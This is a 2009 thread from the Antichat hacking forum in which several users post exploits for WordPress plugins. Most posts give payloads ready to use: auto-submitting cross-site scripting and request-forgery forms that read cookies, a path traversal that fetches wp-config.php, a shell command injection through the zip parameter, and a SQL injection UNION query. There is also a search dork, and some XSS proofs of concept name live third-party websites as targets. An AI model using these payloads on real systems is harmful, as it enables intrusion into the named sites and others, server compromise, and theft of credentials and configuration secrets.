16.06.2009, 11:34
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Плагины Wordpress
WPML Multilingual CMS
Version: 1.0.0
Last Updated: 2009-6-9
Downloads: 9,424
XSS (PoC)
Код:
<div style="display:none;">
<form action='http://wordpress/wp-content/plugins/sitepress-multilingual-cms/ajax.php?icl_ajx_action=set_default_language' method='post' target="ifr" name="xfrm">
<input name="lang" type="text" value="<script>alert(document.cookie)</script>" />
<input type='submit'>
</form>
<iframe src="" name="ifr" width="1" height="1"></iframe>
<script>
document.xfrm.submit();
document.xfrm.lang.value="en";
setTimeout('document.xfrm.submit()', 1000);
</script>
</div>
PHPINFO
Код:
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/inc/php-version-check.php?icl_phpinfo=1
XSS (register_globals = On)
[CODE]http://wordpress/wp-content/plugins/sitepress-multilingual-cms/menu/language-selector.php?w_this_lang
Код:
="><script>alert(document.cookie)</script>
http://wordpress/wp-content/plugins/sitepress-multilingual-cms/modules/absolute-links/management-page.php?total_posts_pages="><script>alert(document.cookie)</script>
__________________
включи голову
|
|
|
16.06.2009, 12:17
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
UnGallery
Version: 0.8
Updated: 2009-6-11
Downloads: 226
Remote File Disclosure
PHP код:
if ($_GET['pic']) {
$filename = $_GET['pic'];
$len = filesize($filename);
$lastslash = strrpos($filename, "/");
$name = substr($filename, $lastslash + 1);
header("Content-type: image/jpeg;\r\n");
header("Content-Length: $len;\r\n");
header("Content-Transfer-Encoding: binary;\r\n");
header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline.
readfile($filename);
}
Код:
$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP код:
$dir = "wp-content/plugins/ungallery/pics/" . $_GET['zip'];
// Create the arrays with the dir's image files
$dp = opendir($dir);
while ($filename = readdir($dp)) {
if (!is_dir($dir."/pics/".$gallery. "/". $filename)) { // If it's a file, begin
$pic_types = array("JPG", "jpg", "GIF", "gif", "PNG", "png");
if (in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename; // If it's a image, add it to pic array
}
}
foreach ($pic_array as $filename) {
$media_files = $media_files . " " . $dir . "/" . $filename;
}
$output = `zip -u -j $dir/pics.zip $media_files`;
print "<pre>$output</pre>";
print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' . $_GET['zip'] . '/pics.zip">here</a>';
print '<br><br>You can return to the gallery <a href="./gallery?gallerylink=' . $_GET['zip'] .'">here.</a>';
Код:
http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
ps: Тут же можно провернуть XSS
__________________
включи голову
Последний раз редактировалось oRb; 16.06.2009 в 16:32..
|
|
|
|
16.06.2009, 13:12
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Mood Personalizer
Version: 1.1
Last Updated: 2009-6-11
Downloads: 453
XSS/XSRF
Код:
<form action='http://wordpress/wp-admin/options-general.php?page=mood-personalizer/mood-personalizer.php' method='post' name="xfrm">
<input name="xMPPic" type="text" value='"><script>alert(document.cookie)</script>' />
<input name="xMPHidd" type="text" value='xMPHidd' />
<input type='submit'>
</form>
<script>document.xfrm.submit();</script>
PHP код:
if($_POST['xMPHidd']=="xMPHidd"){
$xMPPicture = $_POST['xMPPic'];
$xMPPictureSize = $_POST['xMPPictureSize'];
$xMPPicture = str_replace(".2",".".$xMPPictureSize,$xMPPicture);
update_option('xMPPic', $xMPPicture);
}
PHP код:
<img src="<?php bloginfo('url'); ?>/wp-content/plugins/mood-personalizer/images/<?php echo get_option('xMPPic');?>" alt="Mood Personalizer mood image"/>
Если виджет вынесен на сайдбар, то получится активка на морде.
__________________
включи голову
|
|
|
|
16.06.2009, 17:47
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
С нами:
9596153
Репутация:
96
|
|
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/
Author: Kacper
Website: http://devilteam.pl/
Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum,
Pozdro: Ratman, Kopaczka, FDJ
Elo: dla GLOBUSa za pomoc w crackowaniu hasel.
Vuln:
Код:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
big thanks str0ke for you!
be safe all 
# milw0rm.com [2009-06-15]
|
|
|
|
30.06.2009, 19:08
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin Advanced Twitter Widget 1.0.2 XSS Vuln
http://wordpress.org/extend/plugins/advanced-twitter-widget/
\advanced-twitter-widget.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP код:
89: if($_POST['advanced_twitter_widget_value']!=""){
90: $xArrOptions[0]= $_POST['advanced_twitter_widget_title'];
91: $xArrOptions[1]= $_POST['advanced_twitter_widget_value'];
92: $xArrOptions[2]= $_POST['advanced_twitter_widget_type'];
93: $xArrOptions[3]= $_POST['advanced_twitter_widget_count'];
94: update_option('advanced_twitter_widget_options', serialize($xArrOptions));
95: }
97: $xArrOptions = unserialize(get_option('advanced_twitter_widget_options'));
101: $xTitle = $xArrOptions[0];
102: $xValue = $xArrOptions[1];
103: $xType = $xArrOptions[2];
104: $xCount = $xArrOptions[3];
111: Title:<br/><input type="text" name="advanced_twitter_widget_title" value="<?php echo $xTitle;?>" /><br/><br/>
112: Account/Search:<br/><input type="text" name="advanced_twitter_widget_value" value="<?php echo $xValue;?>" /><br/><br/>
exploit:
Код:
POST: advanced_twitter_widget_value=">{XSS1}<a "
POST: advanced_twitter_widget_title=">{XSS2}<a "
POST: advanced_twitter_widget_type=.
POST: advanced_twitter_widget_count=.
|
|
|
|
30.06.2009, 19:09
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin ImHuman 0.0.9 XSS Vuln
http://wordpress.org/extend/plugins/imhuman-a-humanized-captcha/
\imhuman.php
(c)eLwaux 30.06.2009, uasc.org.ua
PHP код:
151: if(isset( $_POST['do'] )) {
152: if ( function_exists('current_user_can') && !current_user_can('manage_options') )
153: die(__('Cheatin’ uh?'));
154: check_admin_referer($plugin_page);
155:
156: $t['imhuman_api_user'] = $_POST['imhuman_api_user'];
157: $t['imhuman_api_key'] = $_POST['imhuman_api_key'];
158: $t['imhuman_row'] = $_POST['imhuman_row'];
159: $t['imhuman_col'] = $_POST['imhuman_col'];
160: $t['imhuman_sel'] = $_POST['imhuman_sel'];
161: $t['imhuman_exc'] = isset($_POST['imhuman_exc'] ) ? 1 : 0;
162: $t['imhuman_word'] = $_POST['imhuman_word'];
163: $t['imhuman_lang'] = $_POST['imhuman_lang'];
164: update_option( 'imhuman_options', $t );
165: $m = '<p>Settings Saved!</p>';
166: }
167: $options = get_option( 'imhuman_options' );
....
194: <td><input type="text" name="imhuman_api_user" id="imhuman_api_user" value="<?php echo $options['imhuman_api_user']; ?>" /></td>
195: </tr>
196: <tr>
197: <th><?php _e('ImHuman Ap? Key'); ?></th>
198: <td><input type="text" name="imhuman_api_key" id="imhuman_api_key" value="<?php echo $options['imhuman_api_key']; ?>" /></td>
exploit:
Код:
POST: do=.
POST: imhuman_api_user=">{XSS1}<a "
POST: imhuman_api_key=">{XSS1}<a "
POST: imhuman_row=.
POST: imhuman_col=.
POST: imhuman_sel=.
POST: imhuman_word=.
POST: imhuman_lang=.
|
|
|
|
30.06.2009, 22:48
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
WordPress Plugin <Live Countdown Timer 1.1> aXSS Vuln
http://www.appchain.com/2009/06/live-countdown-timer-1-1/
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
\live-countdown-timer\live-countdown-timer.php
-----------------------------------------------------------------------------
142: $xPostArr[0] = $_POST['live_countdown_timer_Title'];
147: update_option('live_countdown_timer_Values', serialize($xPostArr));
....
149: $xDBArr = unserialize(get_option('live_countdown_timer_Value s'));
150: $live_countdown_timer_Title = $xDBArr[0];
169: <input type="tex...le" value="<?php echo $live_countdown_timer_Title;?>" />
-----------------------------------------------------------------------------
exploit:
POST: live_countdown_timer_days = .
POST: live_countdown_timer_Title = ">{aXSS}<div id="
POST: live_countdown_timer_seconds = 12
POST: live_countdown_timer_hours = 11
POST: live_countdown_timer_days = 10
|
|
|
|
30.06.2009, 22:50
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = . |
|
|
|
02.07.2009, 21:36
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
Код:
WordPress Plugin Wordpress Toolbar 2.1.1 pXSS & PDisclosure
http://wordpress.org/extend/plugins/wordpress-toolbar/
http://abhinavsingh.com/blog/2009/02/wordpress-toolbar-plugin/
Dork: "inurl:wp-toolbar.php"
## ## ## ##
eLwaux(c)2009 UASC.org.ua
## ## ## ##
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin');
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://www.maktabe.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://helenoticias.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
http://seattlesocialmedia.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
## ## ## ##
XSS
/wp-content/plugins/wordpress-toolbar/toolbar.php
-----------------------------------------------------------------
30: $tourl = $_GET['wp-toolbar-tourl'];
42: $blogtitle = $_GET['wp-toolbar-blogtitle'];
52: <title><?php echo $blogtitle; ?> - Toolbar</title>
56: <iframe frameborder="0" noresize="noresize" src="<?php echo $tourl; ?>"
-----------------------------------------------------------------
PoC:
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title>{XSS}
wordpress.site/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl=">{XSS}<div id="
example:
http://www.alymelfashionfusion.com/Blog/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.pclinuxos.hu/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-blogtitle=</title><script>alert(/xss/);</script>
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/toolbar.php?wp-toolbar-tourl="><script>alert(/xss2/);</script><div%20id="
|
|
|
|
02.07.2009, 21:56
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами:
10005506
Репутация:
784
|
|
Path Disclosure
/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
( call to undefined function add_action() )
-----------------------------------------------------------------
1: <?php
12: include_once("socialsites.php");
14: add_action('admin_menu','wordpress_toolbar_admin') ;
-----------------------------------------------------------------
example:
http://www.watblog.com/wp-content/plugins/wordpress-toolbar/wp-toolbar.php
такое не стоит публиковать, ибо это практически в каждом плагине и инклуд файле вордпресса ;D
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
